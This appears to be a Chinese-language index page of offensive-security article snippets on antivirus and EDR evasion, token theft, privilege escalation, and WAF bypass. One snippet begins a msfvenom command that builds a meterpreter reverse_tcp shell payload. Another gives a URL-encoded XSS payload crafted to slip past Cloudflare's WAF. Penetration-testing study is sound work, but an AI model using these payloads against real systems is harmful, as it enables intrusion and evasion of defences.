介绍在这篇文章中,我将解释 10 种方法/技术来绕过具有最新 Windows Defender intel 的完全更新的 Windows 系统,以执行不受限制的代码(除了权限/访问控制列表)。测试环境...
AV-Bypass-Learning - 免杀学习笔记
shellcode免杀的常用手法,实现绕过常见AV的效果python部分代码来源于奇安信攻防社区文章:https://forum.butian.net/share/1690 作者:St3pBy通过组合...
【横向移动】SharpToken - Windows 令牌窃取
关注我们 | 发现更多精彩内容 在红队横向移动的过程中,我们经常需要窃取其他用户的权限。在现代 EDR 的防御下,我们很难使用 Mimikatz 获取其他用户的权限,如果目标用户没有活着的进程,我们也...
神兵利器 | Potato土豆提权工具Bypass防护思路(附下载)
0x01 常规利用 前段时间在群里看到有人在搜集“土豆”系列的提权工具,抽空整理了下之前用过的一些,还有最近刚放出的DCOMPotato,仅分享给有需要的人。 当然,除了可以利用“土豆”系列的提权工具...
分享 | 红队杀软Bypass指南v1
简单介绍 包含一下基础技术的好用参考链接和工具库地址,如各种语言的加载器: 混淆工具,常用命令等: 进程注入,检测沙箱等: 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信...
Bypass360 | 工具(近期更新)
0x01 工具介绍 绕过360工具。 0x02 安装与使用 1、生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1...
工具开发|目录扫描器dirsearch添加 403绕过
前言 在前几天下着大暴雨的晚上,刷着哔站看着鬼畜,突然刷到一个漏洞赏金src系列-403绕过的视频,突发灵感:想着目录扫描器dirsearch中加上403绕过。这件事情真的是泰裤辣! 运行流程 dir...
风暴免杀工具 StormBypassAV
=================================== 免责声明 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,...
一次失败的SQL注入经历渗透测试
0x00 前言0x01 WAF识别0x02 篇章: Bypassed0x2.1 漏洞证明0x2.2 无限制注入0x03 后续:无疾而终0x04 总结某天,聚合扫描器推送了一份SQL注入的漏洞报告,经过...
Windows版宝塔bypass到RDP登录
声明本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!01 背景在一次攻防演练中,利用漏洞获取到一个webshell,站点是php的,最后发现这个webshell的权限竟然是s...
Bypass CloudFlare WAF
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F ">...
【干货分享】WAF攻防对抗
免责声明本公众号所发布的文章及工具代码等仅限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。文章正文WAF 中文名称Web应用防火墙,是针对于HTTP(S)协议特有的防护设备,在渗透测...
42